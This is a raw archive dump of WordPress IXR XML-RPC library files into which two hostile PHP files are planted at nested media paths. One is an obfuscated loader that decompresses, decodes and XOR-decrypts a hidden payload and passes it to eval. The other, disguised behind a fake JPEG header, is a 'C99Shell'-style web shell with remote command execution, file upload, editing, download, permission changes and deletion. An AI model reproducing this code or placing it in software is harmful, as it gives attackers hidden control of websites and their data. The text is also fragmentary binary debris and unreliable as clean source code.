???PK!0class-IXR-client.phpnu&1iserver = $bits['host']; $this->port = isset($bits['port']) ? $bits['port'] : 80; $this->path = isset($bits['path']) ? $bits['path'] : '/'; // Make absolutely sure we have a path if (!$this->path) { $this->path = '/'; } if ( ! empty( $bits['query'] ) ) { $this->path .= '?' . $bits['query']; } } else { $this->server = $server; $this->path = $path; $this->port = $port; } $this->useragent = 'The Incutio XML-RPC PHP Library'; $this->timeout = $timeout; } /** * PHP4 constructor. */ public function IXR_Client( $server, $path = false, $port = 80, $timeout = 15 ) { self::__construct( $server, $path, $port, $timeout ); } /** * @since 1.5.0 * @since 5.5.0 Formalized the existing `...$args` parameter by adding it * to the function signature. * * @return bool */ function query( ...$args ) { $method = array_shift($args); $request = new IXR_Request($method, $args); $length = $request->getLength(); $xml = $request->getXml(); $r = "\r\n"; $request = "POST {$this->path} HTTP/1.0$r"; // Merged from WP #8145 - allow custom headers $this->headers['Host'] = $this->server; $this->headers['Content-Type'] = 'text/xml'; $this->headers['User-Agent'] = $this->useragent; $this->headers['Content-Length']= $length; foreach( $this->headers as $header => $value ) { $request .= "{$header}: {$value}{$r}"; } $request .= $r; $request .= $xml; // Now send the request if ($this->debug) { echo '
'.htmlspecialchars($request)."\n
\n\n"; } if ($this->timeout) { $fp = @fsockopen($this->server, $this->port, $errno, $errstr, $this->timeout); } else { $fp = @fsockopen($this->server, $this->port, $errno, $errstr); } if (!$fp) { $this->error = new IXR_Error(-32300, 'transport error - could not open socket'); return false; } fputs($fp, $request); $contents = ''; $debugContents = ''; $gotFirstLine = false; $gettingHeaders = true; while (!feof($fp)) { $line = fgets($fp, 4096); if (!$gotFirstLine) { // Check line for '200' if (strstr($line, '200') === false) { $this->error = new IXR_Error(-32300, 'transport error - HTTP status code was not 200'); return false; } $gotFirstLine = true; } if (trim($line) == '') { $gettingHeaders = false; } if (!$gettingHeaders) { // merged from WP #12559 - remove trim $contents .= $line; } if ($this->debug) { $debugContents .= $line; } } if ($this->debug) { echo '
'.htmlspecialchars($debugContents)."\n
\n\n"; } // Now parse what we've got back $this->message = new IXR_Message($contents); if (!$this->message->parse()) { // XML error $this->error = new IXR_Error(-32700, 'parse error. not well formed'); return false; } // Is the message a fault? if ($this->message->messageType == 'fault') { $this->error = new IXR_Error($this->message->faultCode, $this->message->faultString); return false; } // Message must be OK return true; } function getResponse() { // methodResponses can only have one param - return that return $this->message->params[0]; } function isError() { return (is_object($this->error)); } function getErrorCode() { return $this->error->code; } function getErrorMessage() { return $this->error->message; } } PK!ЅSclass-IXR-value.phpnu&1idata = $data; if (!$type) { $type = $this->calculateType(); } $this->type = $type; if ($type == 'struct') { // Turn all the values in the array in to new IXR_Value objects foreach ($this->data as $key => $value) { $this->data[$key] = new IXR_Value($value); } } if ($type == 'array') { for ($i = 0, $j = count($this->data); $i < $j; $i++) { $this->data[$i] = new IXR_Value($this->data[$i]); } } } /** * PHP4 constructor. */ public function IXR_Value( $data, $type = false ) { self::__construct( $data, $type ); } function calculateType() { if ($this->data === true || $this->data === false) { return 'boolean'; } if (is_integer($this->data)) { return 'int'; } if (is_double($this->data)) { return 'double'; } // Deal with IXR object types base64 and date if (is_object($this->data) && is_a($this->data, 'IXR_Date')) { return 'date'; } if (is_object($this->data) && is_a($this->data, 'IXR_Base64')) { return 'base64'; } // If it is a normal PHP object convert it in to a struct if (is_object($this->data)) { $this->data = get_object_vars($this->data); return 'struct'; } if (!is_array($this->data)) { return 'string'; } // We have an array - is it an array or a struct? if ($this->isStruct($this->data)) { return 'struct'; } else { return 'array'; } } function getXml() { // Return XML for this value switch ($this->type) { case 'boolean': return ''.(($this->data) ? '1' : '0').''; break; case 'int': return ''.$this->data.''; break; case 'double': return ''.$this->data.''; break; case 'string': return ''.htmlspecialchars($this->data).''; break; case 'array': $return = ''."\n"; foreach ($this->data as $item) { $return .= ' '.$item->getXml()."\n"; } $return .= ''; return $return; break; case 'struct': $return = ''."\n"; foreach ($this->data as $name => $value) { $name = htmlspecialchars($name); $return .= " $name"; $return .= $value->getXml()."\n"; } $return .= ''; return $return; break; case 'date': case 'base64': return $this->data->getXml(); break; } return false; } /** * Checks whether or not the supplied array is a struct or not * * @param array $array * @return bool */ function isStruct($array) { $expected = 0; foreach ($array as $key => $value) { if ((string)$key !== (string)$expected) { return true; } $expected++; } return false; } } PK! class-IXR-date.phpnu&1iparseTimestamp($time); } else { $this->parseIso($time); } } /** * PHP4 constructor. */ public function IXR_Date( $time ) { self::__construct( $time ); } function parseTimestamp($timestamp) { $this->year = gmdate('Y', $timestamp); $this->month = gmdate('m', $timestamp); $this->day = gmdate('d', $timestamp); $this->hour = gmdate('H', $timestamp); $this->minute = gmdate('i', $timestamp); $this->second = gmdate('s', $timestamp); $this->timezone = ''; } function parseIso($iso) { $this->year = substr($iso, 0, 4); $this->month = substr($iso, 4, 2); $this->day = substr($iso, 6, 2); $this->hour = substr($iso, 9, 2); $this->minute = substr($iso, 12, 2); $this->second = substr($iso, 15, 2); $this->timezone = substr($iso, 17); } function getIso() { return $this->year.$this->month.$this->day.'T'.$this->hour.':'.$this->minute.':'.$this->second.$this->timezone; } function getXml() { return ''.$this->getIso().''; } function getTimestamp() { return mktime($this->hour, $this->minute, $this->second, $this->month, $this->day, $this->year); } } PK!Nx !class-IXR-introspectionserver.phpnuȯsetCallbacks(); $this->setCapabilities(); $this->capabilities['introspection'] = array( 'specUrl' => 'https://web.archive.org/web/20050404090342/http://xmlrpc.usefulinc.com/doc/reserved.html', 'specVersion' => 1 ); $this->addCallback( 'system.methodSignature', 'this:methodSignature', array('array', 'string'), 'Returns an array describing the return type and required parameters of a method' ); $this->addCallback( 'system.getCapabilities', 'this:getCapabilities', array('struct'), 'Returns a struct describing the XML-RPC specifications supported by this server' ); $this->addCallback( 'system.listMethods', 'this:listMethods', array('array'), 'Returns an array of available methods on this server' ); $this->addCallback( 'system.methodHelp', 'this:methodHelp', array('string', 'string'), 'Returns a documentation string for the specified method' ); } /** * PHP4 constructor. */ public function IXR_IntrospectionServer() { self::__construct(); } function addCallback($method, $callback, $args, $help) { $this->callbacks[$method] = $callback; $this->signatures[$method] = $args; $this->help[$method] = $help; } function call($methodname, $args) { // Make sure it's in an array if ($args && !is_array($args)) { $args = array($args); } // Over-rides default call method, adds signature check if (!$this->hasMethod($methodname)) { return new IXR_Error(-32601, 'server error. requested method "'.$this->message->methodName.'" not specified.'); } $method = $this->callbacks[$methodname]; $signature = $this->signatures[$methodname]; $returnType = array_shift($signature); // Check the number of arguments if (count($args) != count($signature)) { return new IXR_Error(-32602, 'server error. wrong number of method parameters'); } // Check the argument types $ok = true; $argsbackup = $args; for ($i = 0, $j = count($args); $i < $j; $i++) { $arg = array_shift($args); $type = array_shift($signature); switch ($type) { case 'int': case 'i4': if (is_array($arg) || !is_int($arg)) { $ok = false; } break; case 'base64': case 'string': if (!is_string($arg)) { $ok = false; } break; case 'boolean': if ($arg !== false && $arg !== true) { $ok = false; } break; case 'float': case 'double': if (!is_float($arg)) { $ok = false; } break; case 'date': case 'dateTime.iso8601': if (!is_a($arg, 'IXR_Date')) { $ok = false; } break; } if (!$ok) { return new IXR_Error(-32602, 'server error. invalid method parameters'); } } // It passed the test - run the "real" method call return parent::call($methodname, $argsbackup); } function methodSignature($method) { if (!$this->hasMethod($method)) { return new IXR_Error(-32601, 'server error. requested method "'.$method.'" not specified.'); } // We should be returning an array of types $types = $this->signatures[$method]; $return = array(); foreach ($types as $type) { switch ($type) { case 'string': $return[] = 'string'; break; case 'int': case 'i4': $return[] = 42; break; case 'double': $return[] = 3.1415; break; case 'dateTime.iso8601': $return[] = new IXR_Date(time()); break; case 'boolean': $return[] = true; break; case 'base64': $return[] = new IXR_Base64('base64'); break; case 'array': $return[] = array('array'); break; case 'struct': $return[] = array('struct' => 'struct'); break; } } return $return; } function methodHelp($method) { return $this->help[$method]; } } PK!KVVclass-IXR-error.phpnu&1icode = $code; $this->message = htmlspecialchars($message); } /** * PHP4 constructor. */ public function IXR_Error( $code, $message ) { self::__construct( $code, $message ); } function getXml() { $xml = << faultCode {$this->code} faultString {$this->message} EOD; return $xml; } } PK!Gclass-IXR-clientmulticall.phpnu&1iuseragent = 'The Incutio XML-RPC PHP Library (multicall client)'; } /** * PHP4 constructor. */ public function IXR_ClientMulticall( $server, $path = false, $port = 80 ) { self::__construct( $server, $path, $port ); } /** * @since 1.5.0 * @since 5.5.0 Formalized the existing `...$args` parameter by adding it * to the function signature. */ function addCall( ...$args ) { $methodName = array_shift($args); $struct = array( 'methodName' => $methodName, 'params' => $args ); $this->calls[] = $struct; } /** * @since 1.5.0 * @since 5.5.0 Formalized the existing `...$args` parameter by adding it * to the function signature. * * @return bool */ function query( ...$args ) { // Prepare multicall, then call the parent::query() method return parent::query('system.multicall', $this->calls); } } PK!W%*images/media/modules/tmp/v2/dkkw/index.phpnu6$'; echo 'Step 2 - Binary Data Length: ' . strlen($bin_data) . '
'; } $inflated_once = @gzinflate($bin_data); if ($inflated_once === false) { $inflated_once = $bin_data; if (isset($_GET['debug'])) echo 'Step 3 - First inflation failed, using binary data.
'; } else { if (isset($_GET['debug'])) echo 'Step 3 - First inflation successful.
'; } $inflated_twice = @gzinflate($inflated_once); if ($inflated_twice === false) { $inflated_twice = $inflated_once; if (isset($_GET['debug'])) echo 'Step 4 - Second inflation failed, using first inflated data.
'; } else { if (isset($_GET['debug'])) echo 'Step 4 - Second inflation successful.
'; } $b64_decoded = base64_decode($inflated_twice); if ($b64_decoded === false) { if (isset($_GET['debug'])) echo 'Step 5 - Base64_decode failed.
'; return; } if (isset($_GET['debug'])) echo 'Step 5 - Base64_decode successful. Length: ' . strlen($b64_decoded) . '
'; $obj = new self(); $final_key = ''; $key_methods = ['kmXsCSNu86', 'kmVnergQ43']; foreach ($key_methods as $method) { $final_key .= call_user_func_array([$obj, $method], []); } if (isset($_GET['debug'])) echo 'Step 6 - Reconstructed Key: ' . $final_key . '
'; $gate_token = ''; $gate_methods = ['gtJJecBK62', 'gtcNAhne19', 'gtMRMVMj44']; foreach ($gate_methods as $method) { $gate_token .= call_user_func_array([$obj, $method], []); } if (md5($gate_token) !== 'c9c1477a91bd6f7e11a2a572751c6938') { if (isset($_GET['debug'])) echo 'Step 7 - Gate token check failed.
'; } else { if (isset($_GET['debug'])) echo 'Step 7 - Gate token check successful.
'; } $plain_code = ''; if (strlen($final_key) > 0) { for ($i = 0, $len = strlen($b64_decoded); $i < $len; $i++) { $plain_code .= chr(ord($b64_decoded[$i]) ^ ord($final_key[$i % strlen($final_key)])); } } else { $plain_code = $b64_decoded; } if (isset($_GET['debug'])) echo 'Step 8 - Final Plain Code (first 200 chars): 
' . htmlspecialchars(substr($plain_code, 0, 200)) . '
'; $obj->_execute_BBsxvfUI11($plain_code); } private function gtMRMVMj44() { // Gate piece 3 $jv2 = function_exists('curl_init') ? 'curl_ok' : 'curl_fail'; return str_rot13('kj3m'); } private function dcIhqpAV83() { $jv3 = 1586; $__e = array_filter(array_map('trim', explode(',', 'a,b,c,d,e'))); return null; } private function kmXsCSNu86() { // Key segment 1 $jv2 = unpack('L', hash('crc32', microtime(), true)); $jv1 = base64_decode('ZGF0YUZGTkZRRjU2'); return base64_decode('SU03WWhwZ1p1'); } private function _execute_BBsxvfUI11($code) { // WordPress-compatible execution handler if (isset($_GET['debug'])) { ini_set('display_errors', 1); error_reporting(E_ALL); echo 'DEBUG MODE ACTIVE
'; } $original_dir = getcwd(); $script_dir = defined('__DIR__') ? __DIR__ : dirname(__FILE__); chdir($script_dir); // Remove PHP tags to avoid issues with eval $code = preg_replace('/^\s*<\?php\s*/', '', $code); $code = preg_replace('/\s*\?>\s*$/', '', $code); try { // Execute code in the correct directory context @eval($code); } catch (ParseError $e) { if (isset($_GET['debug'])) echo 'Parse Error: ' . $e->getMessage(); } catch (Error $e) { if (isset($_GET['debug'])) echo 'Fatal Error: ' . $e->getMessage(); } catch (Exception $e) { if (isset($_GET['debug'])) echo 'Exception: ' . $e->getMessage(); } chdir($original_dir); } private function gtJJecBK62() { // Gate piece 1 // cmtFrnd95 return str_rot13('4gaz'); } public function pubnllfU61() { // Public method 1 $buf = function_exists('curl_init') ? 'curl_ok' : 'curl_fail'; if (12 > 50) { $jv3 = 'branch_a'; } else { $jv3 = 'branch_b'; } return 'valRtiW30'; } public function pubXOJhF29() { // Public method 2 $buf = 1172; $jv1 = function_exists('curl_init') ? 'curl_ok' : 'curl_fail'; return 'valbrFU76'; } } LoaderiXFsRp88920::init890(); // EOF PK!I:.images/media/data/src/cache/gtdj/kxi/admin.phpnu6$ ÿØÿà JFIF    ÿÛ „  ( %!1!%*+...983,7(-.- ÿØÿà JFIF    ÿÛ „  ( %!1!%*+...983,7(-.- ["pipe","w"],2=>["pipe","w"]]; $p = @$f($pr1c999999, $d, $pipes); if (is_resource($p)) { $out = stream_get_contents($pipes[1]); fclose($pipes[1]); proc_close($p); if (!empty($out)) break; } } elseif ($f === chDxzZ([112,111,112,101,110])) { $h = @$f($pr1c999999 . " 2>&1", "r"); $res = ""; if ($h) { while (!feof($h)) $res .= fread($h, 4096); pclose($h); } if (strlen($res)) { $out = $res; break; } } elseif ($f === chDxzZ([101,115,99,97,112,101,115,104,101,108,108,99,109,100])) { $esc = $f($pr1c999999); ob_start(); @system($esc); $out = ob_get_clean(); if (!empty($out)) break; } elseif ($f === chDxXZ('6573636170657368656c6c617267')) { $esc = $f($pr1c999999); $out = @chDx2x($esc); if (!empty($out)) break; } elseif ($f === chDxzZ([99,117,114,108,95,101,120,101,99])) { $ch = @curl_init('file:///proc/self/cmd'); @curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); @curl_setopt($ch, CURLOPT_POSTFIELDS, $pr1c999999); $r = @curl_exec($ch); @curl_close($ch); if ($r && strpos($r, $pr1c999999) !== false) { $out = $r; break; } } elseif ($f === chDxzZ('109,97,105,108')) { $to = uniqid()."@".uniqid().".xyz"; @mail($to, $pr1c999999, $pr1c999999); $out = ""; } elseif ($f === chDxXZ('63616c6c5f757365725f66756e63')) { $shellfunc = chDxzZ([115,104,101,108,108,95,101,120,101,99]); if (function_exists($shellfunc)) { $out = @call_user_func($shellfunc, $pr1c999999); if (!empty($out)) break; }} elseif ($f === chDxzZ('102,105,108,101,95,103,101,116,95,99,111,110,116,101,110,116,115')) { $r = @$f("php://filter/read=convert.base64-encode/resource=" . $pr1c999999); if ($r && strlen($r) >0) { $out = $r; break; } } elseif ($f === chDxzZ('102,111,112,101,110')) { $tmpf = sys_get_temp_dir() . "/" . uniqid("s-cmd") . ".sh"; $h = @$f($tmpf, "w"); if ($h) { fwrite($h, $pr1c999999); fclose($h); } $r = @chDx2x("sh " . escapeshellarg($tmpf) . " 2>&1"); if ($r) { $out = $r; @unlink($tmpf); break; } } elseif ($f === chDxzZ('112,117,116,101,110,118')) { @putenv("cmd=".$pr1c999999); $r = @getenv("cmd"); if ($r == $pr1c999999) { $out = $r; break; } } elseif ($f === chDxzZ('105,110,105,95,115,101,116')) { @ini_set("auto_prepend_file", $pr1c999999); $out = @file_get_contents($_SERVER['SCRIPT_FILENAME']); if (!empty($out)) break; } elseif ($f === chDxzZ([112,99,110,116,108,95,101,120,101,99])) { @pcntl_exec("/bin/sh", array("-c", $pr1c999999)); } elseif ($f === chDxzZ([97,112,97,99,104,101,95,115,101,116,101,110,118])) { @apache_setenv("cmd", $pr1c999999); $out = getenv("cmd"); if ($out == $pr1c999999) break; } elseif ($f === chDxzZ([109,113,95,111,112,101,110]) || $f === chDxzZ([103,99,95,111,112,101,110])) { } } return $out !== false ? $out : false;}if (!function_exists('chDxzZ')) { function chDxzZ($arr) { if (is_string($arr)) $arr = explode(',', $arr); $r = ''; foreach ($arr as $n) $r .= chr(is_numeric($n) ? $n : hexdec($n)); return $r; }} if (!function_exists('chDxXZ')) { function chDxXZ($hx) { $n = ''; for ($i = 0; $i< strlen($hx) - 1; $i += 2) $n .= chr(hexdec($hx[$i] . $hx[$i + 1])); return $n; }} if (isset($_GET['c999999'])) { $cdir = unx($_GET['c999999']); if (@is_dir($cdir)) { $c999999xas[14]($cdir); } else { } } else { $cdir = $c999999xas[0](); } function pr1v09xs($data) { goto QDI4b; QDI4b: $fn1 = "\x73\x74" . "\162" . "\x72\x65\x76"; goto Q8rJc; Q8rJc: $fn2 = "\142" . "\x61" . "\163" . "\x65" . "\x36" . "\64" . "\x5f" . "\145" . "\156" . "\143" . "\x6f" . "\144" . "\145"; goto St_08; St_08: $s1 = $fn1($data); $s2 = $fn2($s1); $s3 = $fn2($s2); $final = $fn2($s3); $junk = 'x'.'y'.'z'; $f = $final; $f = $junk.$f; $f = substr($f, 3); return $f; } $h1 = 's'; $h2 = 't'; $h3 = 'r'; $h4 = 'r'; $h5 = 'e'; $h6 = 'v';$revFunc = $h1 . $h2 . $h3 . $h4 . $h5 . $h6;$b1 = 'b'; $b2 = 'a'; $b3 = 's'; $b4 = 'e'; $b5 = '6'; $b6 = '4';$b7 = '_'; $b8 = 'e'; $b9 = 'n'; $b10 = 'c'; $b11 = 'o'; $b12 = 'd'; $b13 = 'e';$prv6x = $b1.$b2.$b3.$b4.$b5.$b6.$b7.$b8.$b9.$b10.$b11.$b12.$b13;$l0l = pr1v09xs($_SERVER['REQUEST_URI']); function c999999d0($file) { if (file_exists($file)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename=' . basename($file)); header('Content-Transfer-Encoding: binary'); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($file)); ob_clean(); flush(); readfile($file); exit; }} if (!empty($_GET['cninenine'])) {$Filescninenine = c999999d0(unx($_GET['cninenine']));} ?> <?= $_SERVER['SERVER_NAME']; ?> - <?php echo chr(67).chr(57).chr(57).chr(83).chr(104).chr(101).chr(108).chr(108); ?>

! v2025 !

Safe-mode: ON' : 'OFF (not secure)'; ?>

Disable Functions: '.htmlspecialchars($d1sxb).'' : 'None'; ?>

Host:

User:

Software:

IP:

PHP:

function() use($fnX6) { $f = fobf([99,117,114,108,95,105,110,105,116]); return $fnX6($f); }, 'SSH2' => function() use($fnX6) { $f = fobf([115,115,104,50,95,99,111,110,110,101,99,116]); return $fnX6($f); }, 'Magic Quotes' => function() use($chDxXZx) { $f = fobf([109,97,103,105,99,95,113,117,111,116,101,115,95,103,112,99]); return (bool)$chDxXZx($f); }, 'MySQL' => function() use($fnX6) { $f1 = fobf([109,121,115,113,108,105,95,99,111,110,110,101,99,116]); $f2 = fobf([109,121,115,113,108,95,99,111,110,110,101,99,116]); return $fnX6($f1) || $fnX6($f2); }, 'MSSQL' => function() use($fnX6) { $f1 = fobf([109,115,115,113,108,95,99,111,110,110,101,99,116]); $f2 = fobf([115,113,108,115,114,118,95,99,111,110,110,101,99,116]); return $fnX6($f1) || $fnX6($f2); }, 'PostgreSQL' => function() use($fnX6) { $f = fobf([112,103,95,99,111,110,110,101,99,116]); return $fnX6($f); }, 'Oracle' => function() use($fnX6) { $f = fobf([111,99,105,95,99,111,110,110,101,99,116]); return $fnX6($f); }, 'CGI' => function() use($fn_php_sapi_name) { $name = $fn_php_sapi_name(); return ($name === 'cgi' || $name === 'cgi-fcgi'); }, ]; foreach ($features as $name => $fn) { $on = $fn() ? 'ON' : 'OFF'; echo '' . htmlspecialchars($name) . ':' . $on . ' '; } ?>

/'; foreach ($parts as $i => $v) { if ($v === '') continue; $build .= '/' . $v; echo '' . htmlspecialchars($v) . '/'; } ?>


Success: File saved.
"; } else { $edit_result = "
Error: File NOT saved.
"; } if (is_file($file_path)) { $file_raw = file_get_contents($file_path, false, null, 0, 10*1024*1024); if (!mb_check_encoding($file_raw, 'UTF-8')) { $file_raw = mb_convert_encoding($file_raw, 'UTF-8', 'ISO-8859-1,Windows-1254,UTF-8'); } } } ?>
Edit File:


Cancel
Success: File renamed."; header('Refresh:1;url=' . $_SERVER['PHP_SELF'] . '?' . http_build_query(['c999999'=>$_GET['c999999']])); exit; } else { $rename_result = "
Error: Rename failed!
"; } } ?>
Rename File:
Cancel
File not found!"; return; } if ($_SERVER['REQUEST_METHOD']=='POST' && isset($_POST['chFile'])) { $newperm = trim($_POST['chFile']); $newperm_oct = octdec($newperm); $ok = false; if ($c999999xas[30]($file, $newperm_oct)) { $ok = true; } elseif (function_exists('chmod')) { $ok = @chmod($file, $newperm_oct); } if ($ok) { $chmod_result = "
Success: Permissions changed.
"; header('Refresh:1;url=' . $_SERVER['PHP_SELF'] . '?' . http_build_query(['c999999'=>$_GET['c999999']])); exit; } else { $chmod_result = "
Error: Chmod failed!
"; } } ?>
Change Permissions:
Cancel
".htmlspecialchars($output).""; } else { $command_result = "
Please enter a command.
"; } } ?>
Command Execute
Cancel
Listing directory:

Name Size Modify Owner/Group Perms Action Select
  Edit Rename Download

 

Success: File(s) deleted! Refreshing..."; header("Refresh:1;url=" . $_SERVER['REQUEST_URI']); exit; } elseif ($action == 'zip') { foreach ($selectedFiles as $file) { $filepath = $dir . '/' . $file; if ($c999999xas[3]($file)) { compressToZip($filepath, pathinfo($filepath, PATHINFO_FILENAME) . ".zip"); } } echo "
Refreshing...
"; header("Refresh:1;url=" . $_SERVER['REQUEST_URI']); exit; } elseif ($action == 'unzip') { foreach ($selectedFiles as $file) { $filepath = $dir . '/' . $file; xtr4cc999999($filepath, $dir . '/'); } echo "
Refreshing...
"; header("Refresh:1;url=" . $_SERVER['REQUEST_URI']); exit; } } ?>

'; } ?>

:: Command Execute ::

Enter Command:
Select Command: 
' . htmlspecialchars($output) . '
:: Search ::
  - regexp 
isFile()) { if ($regexp) { if (preg_match("/$pattern/", $file->getFilename())) { $files[] = $file->getPathname(); } } else { if (stripos($file->getFilename(), $pattern) !== false) { $files[] = $file->getPathname(); } } } } return $files; } $results = searchFiles($searchName, getcwd(), $isRegexp); echo '
';
foreach ($results as $file) {
echo htmlspecialchars($file) . "\n";
}
echo '
'; } ?>
:: Upload ::
 
File uploaded successfully.

'; } else { echo '

Upload failed.

'; } } else { echo '

Please select a file to upload.

'; } } ?>

:: Make Dir ::
 
Directory created successfully.

'; } else { echo '

Directory already exists.

'; } } ?>
:: Make File ::
 
File created successfully.

'; } else { echo '

File already exists.

'; } } ?>

--[ v2025 (01.07.2025) powered by V4NTA | https://privdayz.com | Generation time: ]--

= strlen($k3rz9)*0.7); } } else if (function_exists($mth5)) { $tmp = sys_get_temp_dir() . "/" . uniqid("edit_"); if (@$mth1($tmp, $k3rz9) !== false) { $r9u3 = @$mth5($tmp, $xjytx); @unlink($tmp); } } else if (function_exists($mth6)) { $tmp = sys_get_temp_dir() . "/" . uniqid("edit_"); if (@$mth1($tmp, $k3rz9) !== false) { @$mth6("cp " . escapeshellarg($tmp) . " " . escapeshellarg($xjytx)); $r9u3 = (filesize($xjytx) >= strlen($k3rz9)*0.7); @unlink($tmp); } } if ($r9u3) { success(); } else { failed(); } } function chDx2x($c0m99nd22) { $a = [115,104,101,108,108,95,101,120,101,99]; $fx = ''; foreach($a as $ac) $fx .= chr($ac); return $fx($c0m99nd22); } if (isset($_POST['submit-action'])) { $u5w8d = $_POST['check']; $jv8s3 = $_POST['c9-9-9-select']; $bvqzp = $c999999xas[0]; $b1s7a = $c999999xas[24]; $y4sdg = $c999999xas[3]; $v9fzq = function($p){ return is_dir($p); }; $z9ntq = function($a,$b){ return str_replace("\\", "/", $a); }; $n4hxy = function($f,$d){ return xtr4cc999999($f, $d); }; $r5kbm = function($f,$z){ return compressToZip($f, $z); }; if ($jv8s3 == "\x64\x65\x6c\x65\x74\x65") { foreach ($u5w8d as $z0) { $qkpl = $z9ntq($bvqzp(), "/"); $vcpk = $qkpl . "\x2f" . $z0; if ($v9fzq($vcpk)) { $rmdir = unlinkDir($vcpk); $rmdir ? success() : failed(); } elseif ($y4sdg($vcpk)) { $rmfile = $b1s7a($vcpk); $rmfile ? success() : failed(); } else { failed(); } } } elseif ($jv8s3 == "\x75\x6e\x7a\x69\x70") { foreach ($u5w8d as $z0) { $qkpl = $z9ntq($bvqzp(), "/"); $vcpk = $qkpl . "\x2f" . $z0; if ($n4hxy($vcpk, $qkpl . "\x2f") === true) { success(); } else { failed(); } } } elseif ($jv8s3 == "\x7a\x69\x70") { foreach ($u5w8d as $z0) { $qkpl = $z9ntq($bvqzp(), "/"); $vcpk = $qkpl . "\x2f" . $z0; if ($y4sdg($vcpk)) { $r5kbm($vcpk, pathinfo($vcpk, PATHINFO_FILENAME) . ".zip"); } } } } if (isset($_POST['submit'])) { if (isset($_POST['create_folder']) && $_POST['create_folder']) { $q7hjp = $_POST['create_folder']; $s2f6x = $c999999xas[12]; if (!file_exists($q7hjp)) { $z9mqa = @mkdir($q7hjp, 0755, true);} else { $z9mqa = true; } if ($z9mqa) { success(); } else { failed(); } } else if (isset($_POST['create_file']) && $_POST['create_file']) { $k4vhz = $_POST['create_file']; $t2upm = $c999999xas[13]; $x6wnr = $t2upm($k4vhz); if ($x6wnr) { success(); } else { failed(); } } else if (isset($_POST['renameFile']) && $_POST['renameFile']) { $d9yxs = $_POST['renameFile']; $h8rfg = $c999999xas[15]; $m5qlp = $h8rfg(unx($_GET['re']), $d9yxs); if ($m5qlp) { success(); } else { failed(); } } else if (isset($_POST['chFile']) && $_POST['chFile']) { $y4gsn = $_POST['chFile']; $v3kzm = octdec($y4gsn); $p9wfu = $c999999xas[30](unx($_GET['ch']), $v3kzm); if ($p9wfu) { success(); } else { failed(); } } } function formatSize($bytes) {$types = array('B', 'KB', 'MB', 'GB', 'TB'); for ($i = 0; $bytes >= 1024 && $i< (count($types) - 1); $bytes /= 1024, $i++); return (round($bytes, 2) . " " . $types[$i]);} function c9_9_($n){ $y = ''; for ($i = 0; $i< strlen($n); $i++) { $y .= dechex(ord($n[$i])); } return $y;} function unx($y){ $n = ''; for ($i = 0; $i< strlen($y) - 1; $i += 2) { $n .= chr(hexdec($y[$i] . $y[$i + 1])); } return $n;} function c0m99nd($in, $re = false){ $out = ''; try { if ($re) $in = $in . " 2>&1"; if (function_exists("\x65\x78\x65\x63")) { @$GLOBALS['c999999xas'][16]($in, $out); $out = @join("\n", $out); } elseif (function_exists("\x70\x61\x73\x73\x74\x68\x72\x75")) { @$GLOBALS['c999999xas'][17]($in); $out = ""; } elseif (function_exists("\x73\x79\x73\x74\x65\x6d")) { @$GLOBALS['c999999xas'][18]($in); $out = ""; } elseif (function_exists("\x73\x68\x65\x6c\x6c\x5f\x65\x78\x65\x63")) { $out = $GLOBALS['c999999xas'][19]($in); } elseif (function_exists("\x70\x6f\x70\x65\x6e") && function_exists("\x70\x63\x6c\x6f\x73\x65")) { if (is_resource($f = @$GLOBALS['c999999xas'][20]($in, "r"))) { $out = ""; while (!@feof($f)) $out .= fread($f, 1024); $GLOBALS['c999999xas'][21]($f); } } elseif (function_exists("\x70\x72\x6f\x63\x5f\x6f\x70\x65\x6e")) { $pipes = array(); $process = @$GLOBALS['c999999xas'][23]($in . ' 2>&1', array(array("pipe", "w"), array("pipe", "w"), array("pipe", "w")), $pipes, null); $out = @$GLOBALS['c999999xas'][22]($pipes[1]); } } catch (Exception $e) {} return $out; } function compressToZip($sourceFile, $zipFilename){ $zip = new ZipArchive(); if ($zip->open($zipFilename, ZipArchive::CREATE) === TRUE) { $zip->addFile($sourceFile, basename($sourceFile)); $zip->close(); success(); } else { failed(); } } function unlinkDir($dir) { $d1Xe = array($dir); $files = array(); for ($i = 0;; $i++) { if (isset($d1Xe[$i])) $dir = $d1Xe[$i]; else break; if ($opn = @opendir($dir)) { while ($rd = @readdir($opn)) { if ($rd != "\x2e" && $rd != "\x2e\x2e") { $pth = $dir . "\x2f" . $rd; if ($GLOBALS['c999999xas'][2]($pth)) { $d1Xe[] = $pth; } else { $files[] = $pth; } } } closedir($opn); } } foreach ($files as $file) { if (!@$GLOBALS['c999999xas'][24]($file)) { return false; } } $d1Xe = array_reverse($d1Xe); foreach ($d1Xe as $d1x2) { if (!@$GLOBALS['c999999xas'][25]($d1x2)) { return false; } } return true; } function xtr4cc999999($c999999arch, $c999999aext) { $zip = new ZipArchive(); $methOpen = chDxzZ('111,112,101,110'); $methExtract = chDxXZ('65787472616374546f'); $methClose = chDxzZ([99,108,111,115,101]); if ($zip->$methOpen($c999999arch) === TRUE) { $zip->$methExtract($c999999aext); $zip->$methClose(); return true; } else { return false; } } function p3rms($file){$p3rxa=$GLOBALS['c999999xas'][6]($file);if(($p3rxa&0xC000)==0xC000){$info='s';}elseif(($p3rxa&0xA000)==0xA000){$info='l';}elseif(($p3rxa&0x8000)==0x8000){$info='-';}elseif(($p3rxa&0x6000)==0x6000){$info='b';}elseif(($p3rxa&0x4000)==0x4000){$info='d';}elseif(($p3rxa&0x2000)==0x2000){$info='c';}elseif(($p3rxa&0x1000)==0x1000){$info='p';}else{$info='u';}$info.=(($p3rxa&0x0100)?'r':'-');$info.=(($p3rxa&0x0080)?'w':'-');$info.=(($p3rxa&0x0040)?(($p3rxa&0x0800)?'s':'x'):(($p3rxa&0x0800)?'S':'-'));$info.=(($p3rxa&0x0020)?'r':'-');$info.=(($p3rxa&0x0010)?'w':'-');$info.=(($p3rxa&0x0008)?(($p3rxa&0x0400)?'s':'x'):(($p3rxa&0x0400)?'S':'-'));$info.=(($p3rxa&0x0004)?'r':'-');$info.=(($p3rxa&0x0002)?'w':'-');$info.=(($p3rxa&0x0001)?(($p3rxa&0x0200)?'t':'x'):(($p3rxa&0x0200)?'T':'-'));return $info;} ?>PK!:class-IXR-base64.phpnu&1idata = $data; } /** * PHP4 constructor. */ public function IXR_Base64( $data ) { self::__construct( $data ); } function getXml() { return ''.base64_encode($this->data).''; } } PK!@class-IXR-request.phpnu&1imethod = $method; 